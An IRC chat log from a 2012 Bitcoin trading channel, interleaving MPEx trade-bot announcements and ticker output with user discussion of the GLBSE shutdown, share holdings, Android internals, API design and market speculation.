https://bitcointalk.org/index.php?topic=112070.0 Nov 30 19:18:56 and Nov 30 19:19:14 https://bitcointalk.org/index.php?topic=122006.0 Nov 30 19:20:21 [MPEX] [S.DICE] 900 @ 0.00333229 = 2.9991 BTC [-] Nov 30 19:20:23 [MPEX] [S.DICE] 850 @ 0.00333413 = 2.834 BTC [+] Nov 30 19:20:51 s'pose i could make it difficult on ppl, and use gpg signed stuff Nov 30 19:23:30 Ukto: that python script is actually the original official glbse client Nov 30 19:24:07 that explains why its so complete Nov 30 19:24:10 oh yes i thought it looked familliar at first glance Nov 30 19:26:11 "black market" unless a lawyer you meet on the train tells you its illegal Nov 30 19:26:57 lol Nov 30 19:27:15 Ukto: cool. I see that you have the API structure now. Planning on implementing an API-compatible platform? At least if you live in the 'states that should be fully legal to do ---> http://www.intomobile.com/2012/06/01/judge-oracle-v-google-rules-apis-not-copyrightable/ Nov 30 19:27:54 LOL Nov 30 19:28:06 well... leagal minus any SEC regulatory issues you run into Nov 30 19:28:08 i never saw that one. nice oracle Nov 30 19:28:14 huh? Nov 30 19:28:18 no, other way around Nov 30 19:28:23 really? Nov 30 19:28:47 google tries to enforce copyrighting apis? 0,o Nov 30 19:28:48 [MPEX] [S.MPOE] 2345 @ 0.00053174 = 1.2469 BTC [+] Nov 30 19:28:49 [MPEX] [S.MPOE] 7802 @ 0.00053165 = 4.1479 BTC [-] Nov 30 19:28:50 [MPEX] [S.MPOE] 15453 @ 0.00053124 = 8.2093 BTC [-] Nov 30 19:28:50 seems.. odd Nov 30 19:28:59 oracle tried to claim dalvik was infringing on their acquired "sun" java platform because the APIs were basically identical Nov 30 19:29:06 ahhhh Nov 30 19:29:25 dalvik being the guts of most apps on google's android OS Nov 30 19:29:33 yes Nov 30 19:29:57 hes the one that designed the rather interesting app "push" system Nov 30 19:30:18 that lets google install w/e they want on your phone, and even without your knowledge/consent. :P Nov 30 19:30:32 ? Nov 30 19:30:32 [MPEX] [S.MPOE] 2345 @ 0.00053204 = 1.2476 BTC [+] Nov 30 19:30:33 [MPEX] [S.MPOE] 18422 @ 0.00053213 = 9.8029 BTC [+] Nov 30 19:30:43 you dont just 'download' an app from their store Nov 30 19:30:53 when you hit install, googles servers send you a msg Nov 30 19:30:58 and blah blah blah Nov 30 19:31:05 ... eh Nov 30 19:31:07 yeh Nov 30 19:31:16 I'm an android developer :P Nov 30 19:31:23 (android OS & apps too) Nov 30 19:31:23 lemme find the paper 1 sec Nov 30 19:32:12 stumbled on it, when I was looking into how to do forced app updates Nov 30 19:32:24 was like a year ago tho Nov 30 19:33:17 so with a bittle lit of luck i'ma sell the planescape project on using bitcoin in their game. Nov 30 19:33:26 planeshift sorry. Nov 30 19:35:01 [MPEX] [S.MPOE] 2345 @ 0.00053159 = 1.2466 BTC [-] Nov 30 19:35:09 [MPEX] [S.MPOE] 13549 @ 0.00053124 = 7.1978 BTC [-] Nov 30 19:37:57 [MPEX] [S.MPOE] 2345 @ 0.00053132 = 1.2459 BTC [+] Nov 30 19:37:58 [MPEX] [S.MPOE] 6948 @ 0.00053124 = 3.6911 BTC [-] Nov 30 19:37:59 [MPEX] [S.MPOE] 20676 @ 0.00052501 = 10.8551 BTC [-] Nov 30 19:38:10 kuzetsa: I'll find the info on it sooner or later Nov 30 19:39:53 not too worried about it Nov 30 19:40:20 I've directly dealt with the google apps distribution platform Nov 30 19:40:43 it described how they do some shit, and send a push type call to the phone directly to download the app Nov 30 19:40:58 it affects me more as a developer than it might as a security "conscious" (paranoid) Nov 30 19:41:09 i'm not worried about how they use it Nov 30 19:41:15 end user... so I'd rather not read the paper anyway Nov 30 19:41:28 I just remember thinking it was interesting, and I remember seeing dalvik mentioned Nov 30 19:41:31 [MPEX] [S.MPOE] 2345 @ 0.00053182 = 1.2471 BTC [+] Nov 30 19:41:32 [MPEX] [S.MPOE] 10755 @ 0.00053213 = 5.7231 BTC [+] Nov 30 19:41:39 fair enough Nov 30 19:41:48 was thinking it was cause he was invovled in creating hte process, might be wrong. Nov 30 19:41:50 dont remember the reference Nov 30 19:42:01 pisses me off when I cant find things tho :/ Nov 30 19:42:15 anywho Nov 30 19:42:25 back to debating how to do a nice secure api Nov 30 19:42:36 w/o going too overboard Nov 30 19:42:48 the android apk files are basically just dalvik. and all that is is a compiled format which is an api-compatible-ish container similar to a java jar file Nov 30 19:43:25 ahhh Nov 30 19:43:35 that makes sense then Nov 30 19:43:56 dalvik is register based instead of stack based like java Nov 30 19:44:20 a few under the hood differences like that which make very little difference in how you code your apps Nov 30 19:44:44 [MPEX] [S.MPOE] 2345 @ 0.00052514 = 1.2315 BTC [-] Nov 30 19:44:45 [MPEX] [S.MPOE] 8397 @ 0.00052501 = 4.4085 BTC [-] Nov 30 19:44:47 [MPEX] [S.MPOE] 1376 @ 0.0005218 = 0.718 BTC [-] Nov 30 19:44:48 [MPEX] [S.MPOE] 1700 @ 0.00052161 = 0.8867 BTC [-] Nov 30 19:44:49 [MPEX] [S.MPOE] 882 @ 0.00052149 = 0.46 BTC [-] Nov 30 19:45:18 I never wrote a native android app. I only used corona since it was Lua and fast to do what i needed Nov 30 19:45:19 :P Nov 30 19:45:27 oh Nov 30 19:45:33 technically, "native" is something different Nov 30 19:45:52 if you make android native apps, they natively call the android C libraries and whatnot Nov 30 19:46:02 ahhhh Nov 30 19:46:30 ... I haven't had any major need to play with the native version of the android SDK either Nov 30 19:46:44 sounds like it would be a pain :P Nov 30 19:47:17 http://developer.android.com/tools/sdk/ndk/index.html ---> (quote) ... The NDK is a toolset that allows you to implement parts of your app using native-code languages such as C and C++ (yes, it's a pain) Nov 30 19:49:23 grr Nov 30 19:49:26 use pgp Nov 30 19:49:32 ...serriously Nov 30 19:49:38 gpg is an implementation Nov 30 19:49:43 lol Nov 30 19:49:45 just say pgp since you're pgp signing Nov 30 19:49:50 fine :P Nov 30 19:49:59 so picky Nov 30 19:50:47 Ukto: oh, it's not your fault Nov 30 19:50:47 ^see above lol Nov 30 19:50:47 LOL Nov 30 19:50:47 http://www.indiegogo.com/cuddle-mattress Nov 30 19:52:17 [MPEX] [S.MPOE] 11000 @ 0.00052253 = 5.7478 BTC [+] Nov 30 19:52:18 [MPEX] [S.MPOE] 17700 @ 0.00052149 = 9.2304 BTC [-] Nov 30 19:57:08 why do you want pgp over gpg btw? Nov 30 20:00:37 kuzetsa gpg! Nov 30 20:04:28 [MPEX] [S.MPOE] 2345 @ 0.0005321 = 1.2478 BTC [+] Nov 30 20:04:29 [MPEX] [S.MPOE] 9855 @ 0.00053213 = 5.2441 BTC [+] Nov 30 20:04:31 [MPEX] [S.MPOE] 7928 @ 0.00053244 = 4.2212 BTC [+] Nov 30 20:10:23 [MPEX] [S.MPOE] 2345 @ 0.00053174 = 1.2469 BTC [-] Nov 30 20:10:25 [MPEX] [S.MPOE] 4421 @ 0.00053147 = 2.3496 BTC [-] Nov 30 20:10:26 [MPEX] [S.MPOE] 27927 @ 0.00052149 = 14.5637 BTC [-] Nov 30 20:12:54 [MPEX] [S.MPOE] 13734 @ 0.00052149 = 7.1621 BTC [-] Nov 30 20:12:56 [MPEX] [S.MPOE] 2566 @ 0.00052133 = 1.3377 BTC [-] Nov 30 20:21:05 [MPEX] [S.MPOE] 2134 @ 0.00052133 = 1.1125 BTC [-] Nov 30 20:21:07 [MPEX] [S.MPOE] 25366 @ 0.00052122 = 13.2213 BTC [-] Nov 30 20:22:05 [MPEX] [S.MPOE] 2345 @ 0.00053212 = 1.2478 BTC [+] Nov 30 20:22:07 [MPEX] [S.MPOE] 2870 @ 0.00053244 = 1.5281 BTC [+] Nov 30 20:32:13 [MPEX] [S.MPOE] 8100 @ 0.00052614 = 4.2617 BTC [-] Nov 30 20:32:14 [MPEX] [S.MPOE] 2345 @ 0.00052154 = 1.223 BTC [-] Nov 30 20:32:15 [MPEX] [S.MPOE] 1534 @ 0.00052122 = 0.7996 BTC [-] Nov 30 20:32:16 [MPEX] [S.MPOE] 4721 @ 0.00052122 = 2.4607 BTC [-] Nov 30 20:36:23 http://shrani.si/f/2U/eB/26Bg0NXt/moneflow.png Nov 30 20:36:27 sell before its too late! Nov 30 20:37:23 preweeked breakout chances are getting slimmer Nov 30 20:42:39 ;;ticker Nov 30 20:42:40 BTCUSD ticker | Best bid: 12.58502, Best ask: 12.58503, Bid-ask spread: 0.00001, Last trade: 12.58502, 24 hour volume: 26279.10705937, 24 hour low: 12.40000, 24 hour high: 12.65000, 24 hour vwap: 12.54155 Nov 30 20:43:53 its going to get volatile Nov 30 20:44:01 up im here Nov 30 20:44:03 im Nov 30 20:44:06 in* Nov 30 20:44:47 nothing happens when everyone expects it Nov 30 20:47:13 [MPEX] [S.MPOE] 2345 @ 0.00053221 = 1.248 BTC [+] Nov 30 20:47:14 [MPEX] [S.MPOE] 302 @ 0.00053244 = 0.1608 BTC [+] Nov 30 20:47:15 [MPEX] [S.MPOE] 2600 @ 0.00053286 = 1.3854 BTC [+] Nov 30 20:47:16 [MPEX] [S.MPOE] 6600 @ 0.00053389 = 3.5237 BTC [+] Nov 30 20:47:17 [MPEX] [S.MPOE] 15606 @ 0.00053406 = 8.3345 BTC [+] Nov 30 20:50:46 [MPEX] [S.MPOE] 2345 @ 0.00052146 = 1.2228 BTC [-] Nov 30 20:50:47 [MPEX] [S.MPOE] 6555 @ 0.00052122 = 3.4166 BTC [-] Nov 30 21:01:19 [MPEX] [S.MPOE] 8224 @ 0.00052122 = 4.2865 BTC [-] Nov 30 21:01:21 [MPEX] [S.MPOE] 9650 @ 0.00052112 = 5.0288 BTC [-] Nov 30 21:01:22 [MPEX] [S.MPOE] 6750 @ 0.00052109 = 3.5174 BTC [-] Nov 30 21:01:23 [MPEX] [S.MPOE] 6759 @ 0.00052106 = 3.5218 BTC [-] Nov 30 21:06:49 [MPEX] [S.DICE] 1500 @ 0.00333413 = 5.0012 BTC [+] Nov 30 21:08:10 [MPEX] [S.MPOE] 2345 @ 0.00052376 = 1.2282 BTC [+] Nov 30 21:08:11 [MPEX] [S.MPOE] 24500 @ 0.00052381 = 12.8333 BTC [+] Nov 30 21:08:12 [MPEX] [S.MPOE] 3700 @ 0.00053361 = 1.9744 BTC [+] Nov 30 21:08:14 [MPEX] [S.MPOE] 11968 @ 0.00053406 = 6.3916 BTC [+] Nov 30 21:08:15 [MPEX] [S.MPOE] 7611 @ 0.00053435 = 4.0669 BTC [+] Nov 30 21:15:51 [MPEX] [S.MPOE] 3200 @ 0.00053095 = 1.699 BTC [-] Nov 30 21:15:52 [MPEX] [S.MPOE] 2345 @ 0.00052107 = 1.2219 BTC [-] Nov 30 21:15:54 [MPEX] [S.MPOE] 6841 @ 0.00052106 = 3.5646 BTC [-] Nov 30 21:15:55 [MPEX] [S.MPOE] 9064 @ 0.00052066 = 4.7193 BTC [-] Nov 30 21:38:42 ;;ticker Nov 30 21:38:43 BTCUSD ticker | Best bid: 12.48002, Best ask: 12.48003, Bid-ask spread: 0.00001, Last trade: 12.48002, 24 hour volume: 27029.09883168, 24 hour low: 12.40000, 24 hour high: 12.65000, 24 hour vwap: 12.54454 Nov 30 21:38:51 10c already, told ya :p Nov 30 21:41:48 uh, up or down ? Nov 30 21:42:47 down Nov 30 21:42:57 19:36.19 ( kakobreklaaa ) http://shrani.si/f/2U/eB/26Bg0NXt/moneflow.png Nov 30 21:42:57 19:36.23 ( kakobreklaaa ) sell before its too late! Nov 30 21:42:59 :> Nov 30 21:44:12 lol mk Nov 30 21:54:09 [MPEX] [S.MPOE] 7636 @ 0.00052066 = 3.9758 BTC [-] Nov 30 21:54:10 [MPEX] [S.MPOE] 8900 @ 0.00052056 = 4.633 BTC [-] Nov 30 21:54:12 [MPEX] [S.MPOE] 12600 @ 0.00052029 = 6.5557 BTC [-] Nov 30 21:54:13 [MPEX] [S.MPOE] 2014 @ 0.00052025 = 1.0478 BTC [-] Nov 30 22:01:21 [MPEX] [S.MPOE] 19100 @ 0.00052025 = 9.9368 BTC [-] Nov 30 22:05:25 [MPEX] [S.MPOE] 9236 @ 0.00052025 = 4.805 BTC [-] Nov 30 22:05:26 [MPEX] [S.MPOE] 5964 @ 0.00052007 = 3.1017 BTC [-] Nov 30 22:09:20 [MPEX] [S.MPOE] 2345 @ 0.00052101 = 1.2218 BTC [+] Nov 30 22:09:21 [MPEX] [S.MPOE] 7355 @ 0.00052104 = 3.8322 BTC [+] Nov 30 22:17:27 [MPEX] [S.DICE] 1300 @ 0.00333413 = 4.3344 BTC [+] Nov 30 22:17:29 [MPEX] [S.DICE] 1050 @ 0.00335016 = 3.5177 BTC [+] Nov 30 22:17:30 [MPEX] [S.DICE] 1550 @ 0.00336141 = 5.2102 BTC [+] Nov 30 22:18:40 [MPEX] [S.MPOE] 2345 @ 0.00052021 = 1.2199 BTC [-] Nov 30 22:18:41 [MPEX] [S.MPOE] 17886 @ 0.00052007 = 9.302 BTC [-] Nov 30 22:18:42 [MPEX] [S.MPOE] 6820 @ 0.00052 = 3.5464 BTC [-] Nov 30 22:25:59 [MPEX] [S.MPOE] 6380 @ 0.00052 = 3.3176 BTC [-] Nov 30 22:26:01 [MPEX] [S.MPOE] 7820 @ 0.00051999 = 4.0663 BTC [-] Nov 30 22:29:27 kako: what is series 2? Nov 30 22:30:05 Also, matching a graph with another graph is pretty pointless. Nov 30 22:30:13 money flow oscillator Nov 30 22:31:23 Well if it's money flow... then it's only natural it match somewhat the price. Nov 30 22:33:07 [MPEX] [S.MPOE] 2345 @ 0.0005209 = 1.2215 BTC [+] Nov 30 22:33:08 [MPEX] [S.MPOE] 12055 @ 0.00052104 = 6.2811 BTC [+] Nov 30 22:33:12 I'll say it so everyone knows: buy buy buy Nov 30 22:33:44 i'll say, don't do anything. Nov 30 22:34:18 [MPEX] [S.MPOE] 2345 @ 0.00052099 = 1.2217 BTC [-] Nov 30 22:34:20 [MPEX] [S.MPOE] 10134 @ 0.00052104 = 5.2802 BTC [+] Nov 30 22:34:21 [MPEX] [S.MPOE] 12621 @ 0.00052204 = 6.5887 BTC [+] Nov 30 22:35:52 I buy put options Nov 30 22:36:00 I mean sell put options Nov 30 22:36:31 Profits to be had. Nov 30 22:36:54 If price go down... buy cheap bitcoins. Nov 30 22:37:26 !ticker Nov 30 22:37:27 Provide ticker. Nov 30 22:37:29 er Nov 30 22:37:30 ;;ticker Nov 30 22:37:30 BTCUSD ticker | Best bid: 12.48748, Best ask: 12.61990, Bid-ask spread: 0.13242, Last trade: 12.48547, 24 hour volume: 26919.53857884, 24 hour low: 12.40200, 24 hour high: 12.65000, 24 hour vwap: 12.54654 Nov 30 22:52:22 [MPEX] [S.MPOE] 2345 @ 0.00052012 = 1.2197 BTC [-] Nov 30 22:52:23 [MPEX] [S.MPOE] 2880 @ 0.00051999 = 1.4976 BTC [-] Nov 30 22:52:25 [MPEX] [S.MPOE] 11490 @ 0.00051977 = 5.9722 BTC [-] Nov 30 22:55:49 [MPEX] [S.MPOE] 2345 @ 0.00052136 = 1.2226 BTC [+] Nov 30 22:56:36 [MPEX] [S.MPOE] 17555 @ 0.00052167 = 9.1579 BTC [+] Nov 30 22:56:38 [MPEX] [S.MPOE] 6445 @ 0.00051977 = 3.3499 BTC [-] Nov 30 23:01:44 ;;ticker Nov 30 23:01:45 BTCUSD ticker | Best bid: 12.55110, Best ask: 12.55111, Bid-ask spread: 0.00001, Last trade: 12.55110, 24 hour volume: 26371.56178368, 24 hour low: 12.40200, 24 hour high: 12.65000, 24 hour vwap: 12.54851 Nov 30 23:13:54 [12:05:29] But in particular, it is the height of stupidity to encourage bitcoin use in (a) countries under sanction by the US and Europe Nov 30 23:14:26 we didn't have a good shitstorm in a long time, but now it comes: https://bitcointalk.org/index.php?topic=128532.0 Nov 30 23:15:39 [MPEX] [S.MPOE] 2345 @ 0.00052004 = 1.2195 BTC [+] Nov 30 23:15:41 [MPEX] [S.MPOE] 9605 @ 0.00052003 = 4.9949 BTC [-] Nov 30 23:16:36 [12:12:55] If you market bitcoin directly to people who are _already_ being targeted -- Taliban, Iran -- you put bitcoin right into the crosshairs Nov 30 23:16:55 [MPEX] [O.BTCUSD.P060T] 10 @ 0.00000001 BTC [-] Nov 30 23:18:05 delaying the inevitable Nov 30 23:18:19 that whole log is good to read, to see where bitcoin foundation stands politically Nov 30 23:19:03 [MPEX] [S.MPOE] 2345 @ 0.00052027 = 1.22 BTC [+] Nov 30 23:19:05 [MPEX] [S.MPOE] 6455 @ 0.00052003 = 3.3568 BTC [-] Nov 30 23:21:14 [MPEX] [S.DICE] 1500 @ 0.00336141 = 5.0421 BTC [+] Nov 30 23:21:14 [MPEX] [S.DICE] 1700 @ 0.00337442 = 5.7365 BTC [+] Nov 30 23:25:38 [MPEX] [S.MPOE] 17913 @ 0.00052169 = 9.345 BTC [+] Nov 30 23:25:39 [MPEX] [S.MPOE] 10087 @ 0.00052204 = 5.2658 BTC [+] Nov 30 23:28:59 [MPEX] [S.MPOE] 2345 @ 0.00052188 = 1.2238 BTC [-] Nov 30 23:29:00 [MPEX] [S.MPOE] 2825 @ 0.00052204 = 1.4748 BTC [+] Nov 30 23:29:02 [MPEX] [S.MPOE] 22330 @ 0.00052274 = 11.6728 BTC [+] Nov 30 23:36:07 [MPEX] [S.MPOE] 2345 @ 0.0005226 = 1.2255 BTC [-] Nov 30 23:36:08 [MPEX] [S.MPOE] 6670 @ 0.00052274 = 3.4867 BTC [+] Nov 30 23:36:10 [MPEX] [S.MPOE] 2335 @ 0.00052393 = 1.2234 BTC [+] Nov 30 23:39:22 [MPEX] [S.MPOE] 2345 @ 0.00052153 = 1.223 BTC [-] Nov 30 23:39:24 [MPEX] [S.MPOE] 5405 @ 0.00052142 = 2.8183 BTC [-] Nov 30 23:44:35 [MPEX] [S.MPOE] 2345 @ 0.00052369 = 1.2281 BTC [+] Nov 30 23:44:37 [MPEX] [S.MPOE] 11405 @ 0.00052393 = 5.9754 BTC [+] Nov 30 23:47:59 [MPEX] [S.MPOE] 28835 @ 0.00052393 = 15.1075 BTC [+] Nov 30 23:48:17 ;;ticker Nov 30 23:48:18 BTCUSD ticker | Best bid: 12.58001, Best ask: 12.58002, Bid-ask spread: 0.00001, Last trade: 12.58001, 24 hour volume: 25079.22583532, 24 hour low: 12.42423, 24 hour high: 12.65000, 24 hour vwap: 12.55148 Nov 30 23:48:36 up it goes Nov 30 23:48:57 shoulda kept calls at 12 Nov 30 23:53:23 why? i sold C120Ts to mpex bot at ~0.7 and i'm still in black well enough Nov 30 23:54:04 few days ago i still saw the bot trying to iunsuccessfully sell them Nov 30 23:54:29 mircea_popescu: So, if I leave my mpex account with zero btc the assets got locked, right? As in non tradable? Nov 30 23:55:11 rdponticelli ya Nov 30 23:57:27 I don't see the benefit of that... Nov 30 23:57:42 If someone has your private key to trade, they can as well deposit... Nov 30 23:57:54 What purpose does it serve? Nov 30 23:58:01 To unlock them afterwards I only have to deposit btc again? Nov 30 23:58:25 I think so. Or sign a message with private key? Nov 30 23:58:43 Anyway, you need the private key to trade and the private key to authorize the account back... Nov 30 23:59:26 anyone worked with mod_rewrites? fighting to get a RewriteCond to work Dec 01 00:00:07 I want the signed recipt of my F.GIGA.ETF holdings, locked Dec 01 00:01:40 I don't share my key ;) Dec 01 00:02:33 rdponticelli deposit and whine at me. Dec 01 00:02:42 But I would like to know if it would be a problem later to reactivate my account... << mircea_popescu? Dec 01 00:03:19 hmm, how many shares do you have? Dec 01 00:03:48 I always wondered who had all the other shares. Dec 01 00:04:16 So basically, make a signed request Dec 01 00:04:40 mircea_popescu: So, not too troublesome? Dec 01 00:04:58 Namjies: I have around 115000 Dec 01 00:05:10 rdponticelli well, moderately. Dec 01 00:05:17 You have a large holding too, right? Dec 01 00:06:05 I have over half all of them I believe. Dec 01 00:06:17 566000 Dec 01 00:07:00 Are you doing something to claim them? Dec 01 00:07:38 Probably going to ask Gigavps for them. Probably won't do much tho. Dec 01 00:09:50 It would be practical if Mircea signed us a message about the amount held after trading is alted, before erasing data. Dec 01 00:11:18 But I recall he's not interested in doing any extra task at all in relation to anything due to GLBSE closing down. Dec 01 00:11:57 mircea_popescu: The etf will be delisted tomorrow? Or today when everything clears? Dec 01 00:12:54 Namjies: We can "pool" our claim Dec 01 00:13:06 soon at any rate. Dec 01 00:13:32 Nah, not sure pooling claims is a good idea. Dec 01 00:13:35 [MPEX] [S.MPOE] 6325 @ 0.00052393 = 3.3139 BTC [+] Dec 01 00:13:36 [MPEX] [S.MPOE] 6325 @ 0.00052393 = 3.3139 BTC [+] Dec 01 00:13:37 [MPEX] [S.MPOE] 10309 @ 0.00052454 = 5.4075 BTC [+] Dec 01 00:13:38 [MPEX] [S.MPOE] 10309 @ 0.00052454 = 5.4075 BTC [+] Dec 01 00:13:40 [MPEX] [S.MPOE] 2345 @ 0.00052156 = 1.2231 BTC [-] Dec 01 00:13:41 [MPEX] [S.MPOE] 12845 @ 0.00052142 = 6.6976 BTC [-] Dec 01 00:13:42 [MPEX] [S.MPOE] 14650 @ 0.0005202 = 7.6209 BTC [-] Dec 01 00:13:43 [MPEX] [S.MPOE] 12845 @ 0.00052142 = 6.6976 BTC [+] Dec 01 00:13:44 [MPEX] [S.MPOE] 9090 @ 0.00052003 = 4.7271 BTC [-] Dec 01 00:13:45 [MPEX] [S.MPOE] 14650 @ 0.0005202 = 7.6209 BTC [+] Dec 01 00:13:45 [MPEX] [S.MPOE] 3013 @ 0.00051977 = 1.5661 BTC [-] Dec 01 00:13:46 [MPEX] [S.MPOE] 9090 @ 0.00052003 = 4.7271 BTC [+] Dec 01 00:13:47 [MPEX] [S.MPOE] 10502 @ 0.00051933 = 5.454 BTC [-] Dec 01 00:13:48 [MPEX] [S.MPOE] 3013 @ 0.00051977 = 1.5661 BTC [+] Dec 01 00:13:49 [MPEX] [S.MPOE] 8157 @ 0.00051933 = 4.2362 BTC [-] Dec 01 00:14:05 mircea_popescu: And will we keep the proof on our accounts of our holdings or it will it be erased? Dec 01 00:14:15 Erased. Dec 01 00:14:29 All signed transaction records are kept however. Dec 01 00:14:48 hm Dec 01 00:14:54 But I don't think Mircea would fetch those for you. Dec 01 00:14:55 ;;google conversation discarded as worthless Dec 01 00:14:56 Conversation Discarded as Worthless pe Trilema - Un blog de ...: ; scrap - definition of scrap by the Free Online Dictionary, Thesaurus ...: ; Love Shack Compassion Ministry: Dec 01 00:15:03 see that first link rdponticelli Dec 01 00:17:44 what? Love shack from a church? That 3rd link looks suspicious. Dec 01 00:18:28 ah HAH Dec 01 00:18:36 alright.. so I did a sweet setup Dec 01 00:18:43 ? Dec 01 00:19:03 I set things for the API to be on a subdomain (so I can move it to its own server if things get hefty) Dec 01 00:19:16 API for? Dec 01 00:19:21 BF Dec 01 00:19:24 Yeah, already read it, mircea_popescu Dec 01 00:22:14 But I don't agree with some of the points and I'm willing to try keep the link with giga... Dec 01 00:22:32 [MPEX] [S.MPOE] 2345 @ 0.00051962 = 1.2185 BTC [+] Dec 01 00:22:34 [MPEX] [S.MPOE] 20455 @ 0.00051933 = 10.6229 BTC [-] Dec 01 00:22:40 thing is you don't actually have a link with giga. Dec 01 00:23:22 mircea_popescu: I would need to deal with whoever had the shares for you, too. Could you send him my way? Dec 01 00:23:30 nope. Dec 01 00:24:31 Well, I would like to chat with giga about that... Dec 01 00:26:31 by all means Dec 01 00:26:50 mircea_popescu: Wouldn't you tell me who he is either? Dec 01 00:27:14 giga ?! Dec 01 00:27:39 didn't anyone notice a problem with s.mpoe? Dec 01 00:28:10 there are 1e18 buy/sell orders Dec 01 00:28:13 mircea_popescu: No, whoever was holding the glbse shares for the etf Dec 01 00:28:14 bah bs Dec 01 00:28:34 btw, withdrawal requested Dec 01 00:29:00 [MPEX] [S.MPOE] 7200 @ 0.00052043 = 3.7471 BTC [+] Dec 01 00:30:13 whoever is buying/selling 18`446`744`073`709`529`088 of S.MPOE, raise your hand Dec 01 00:30:27 I thought it way you Dec 01 00:30:34 lol Dec 01 00:30:35 that bot you're braggin' about Dec 01 00:31:16 that's awesome Dec 01 00:31:21 indeed i am testing modifications, but my stats are pretty normal Dec 01 00:32:05 yo, MP, are the assbot posts here all of the MPEx trades? or just some portion of 'em? Dec 01 00:33:17 anyone who wants to short s.bvps b/c rg is awol and they haven't put out a P&L statement in months, I have a little over 2k shares available to lend Dec 01 00:33:21 as long as the duct tape holds Dec 01 00:33:26 [MPEX] [S.MPOE] 2345 @ 0.00052453 = 1.23 BTC [+] Dec 01 00:33:27 [MPEX] [S.MPOE] 2355 @ 0.00052485 = 1.236 BTC [+] Dec 01 00:33:36 smickles do i need to call rg Dec 01 00:34:03 ...on the phone Dec 01 00:34:50 jcpham: well, I can't get a word from him or grubles about the financial reports, or what rg meant about merging bitvps with his boss Dec 01 00:35:06 see i don't even know what that means Dec 01 00:35:07 for a week or so Dec 01 00:35:07 burnside should be all Dec 01 00:35:22 i know grubles has been awol for some time now Dec 01 00:35:26 months Dec 01 00:36:08 i mean, he's been paying the dividend (a day late sometimes), but consistantly Dec 01 00:36:25 but the reports just stop some months ago Dec 01 00:36:43 jcpham i recall talking to him this month Dec 01 00:36:57 things are pretty quiet then on the satoshidice Dec 01 00:37:00 last time i spoke to rg on the phone Dec 01 00:37:04 so he's not exactly living up to all of what's in the contract Dec 01 00:37:06 he said grubles had been awol to him Dec 01 00:37:08 making a sweet api doc display.. Dec 01 00:37:13 making a sweet api Dec 01 00:37:21 I want to get some. :) Dec 01 00:37:23 gonna check whos naughty or nice Dec 01 00:37:32 seems like you guys know more than me Dec 01 00:37:49 if it is an emergency i can call him Dec 01 00:38:17 22:36 < burnside> things are pretty quiet then on the satoshidice <<< are you kidding, have a look at blockchain's front page, most are SD txns scrolling by Dec 01 00:38:19 you talk to rg on the phone? Dec 01 00:38:25 once Dec 01 00:38:34 smickles, I meant with the share trading. =P Dec 01 00:38:40 my vps wasn't working Dec 01 00:38:44 i tracked him down Dec 01 00:39:00 burnside: ah, ok. well, it's higher volume than typical for s.dice Dec 01 00:39:01 communications were established Dec 01 00:39:07 he knows where i work and my office number Dec 01 00:39:10 i know his cell Dec 01 00:39:21 jcpham: i dunno if it's an emergency, just not ideal Dec 01 00:39:25 liek everything else, my OCD ia cuasing me to go extreme on the api docs. :P Dec 01 00:39:28 including testing Dec 01 00:39:38 yeah i see the worry Dec 01 00:39:59 Ukto: api docs? just follow after nefario and make 99% of the api secret Dec 01 00:39:59 I'm gonna have to get an MPEx acct I think Dec 01 00:40:21 burnside: i've never regretted getting mine Dec 01 00:40:35 [MPEX] [S.MPOE] 2345 @ 0.00052455 = 1.2301 BTC [-] Dec 01 00:40:36 [MPEX] [S.MPOE] 13795 @ 0.00052485 = 7.2403 BTC [+] Dec 01 00:40:38 [MPEX] [S.MPOE] 360 @ 0.00052523 = 0.1891 BTC [+] Dec 01 00:40:59 what other good stuff is on there? Dec 01 00:41:13 burnside: the best stuff is the options Dec 01 00:41:19 ^ this Dec 01 00:41:34 yeah, nowhere else you can get that Dec 01 00:41:42 that I know of anyway Dec 01 00:41:58 smickles: I already commentated on that Dec 01 00:42:12 burnside, and bonds, but they are sold by email Dec 01 00:42:15 how about as long as my vps is online everything is fine Dec 01 00:42:24 so just /whois jcpham Dec 01 00:42:32 if you get no response, bitvps is fubar Dec 01 00:42:44 you don't need an account to do the mpbor things ("bonds") Dec 01 00:43:01 what are the good bonds? Dec 01 00:43:20 let's dig this up Dec 01 00:43:35 burnside http://trilema.com/2012/sa-ne-jucam-de-a-investitiile-n-bitcoini/#comment-78745 Dec 01 00:43:36 burnside: it's just one bond, to fund mircea_popescu's option bot Dec 01 00:43:38 read that story Dec 01 00:44:35 burnside: also, note that it doesn't fit a 'letter for letter' definiton of an IRL bond Dec 01 00:44:59 woah, when did blockchain switch their logo? Dec 01 00:45:05 cool, I'll check it out Dec 01 00:45:12 burnside, and they are not insured, after all :p Dec 01 00:45:18 the 'oc' form a little bomb now Dec 01 00:45:27 heh, I didn't mean buy insurance btw Dec 01 00:45:37 I meant that an agreement with mpex would be good insurance Dec 01 00:45:39 ;) Dec 01 00:45:44 [MPEX] [S.MPOE] 17761 @ 0.00052523 = 9.3286 BTC [+] Dec 01 00:45:49 well... "insured", they have a clear revenue/loss model Dec 01 00:45:54 which is pretty much unique afaik. Dec 01 00:48:50 What guarantee do we have that the unkown proxy who held Gigamining shares for you won't claim them for himself alone? I think that's the biggest concern with the fact shares are dropped on your part. Dec 01 00:49:33 ;;time Dec 01 00:49:34 02:49 PM, November 30, 2012 Dec 01 00:49:48 ;;ticker Dec 01 00:49:57 BTCUSD ticker | Best bid: 12.58112, Best ask: 12.58115, Bid-ask spread: 0.00003, Last trade: 12.58112, 24 hour volume: 24654.39650294, 24 hour low: 12.42423, 24 hour high: 12.65000, 24 hour vwap: 12.55466 Dec 01 00:49:57 ;;bc,24hprc Dec 01 00:49:57 12.51 Dec 01 00:50:35 [MPEX] [S.MPOE] 2345 @ 0.00052072 = 1.2211 BTC [-] Dec 01 00:50:37 [MPEX] [S.MPOE] 10363 @ 0.00052043 = 5.3932 BTC [-] Dec 01 00:53:18 [MPEX] [S.MPOE] 2345 @ 0.00052504 = 1.2312 BTC [+] Dec 01 00:53:20 [MPEX] [S.MPOE] 1379 @ 0.00052523 = 0.7243 BTC [+] Dec 01 00:53:21 [MPEX] [S.MPOE] 20818 @ 0.00052937 = 11.0204 BTC [+] Dec 01 00:54:37 When I trust someone, my trust doesn't extend further to the people they trust. Dec 01 00:55:23 .j #swagger Dec 01 00:56:10 [MPEX] [S.DICE] 200 @ 0.00337442 = 0.6749 BTC [+] Dec 01 00:56:24 heh burnside ^ there's you s.dice action Dec 01 00:58:19 I've been sitting on S.Dice since the IPO Dec 01 00:58:24 and never looked at my account Dec 01 00:58:30 Namjies it's really 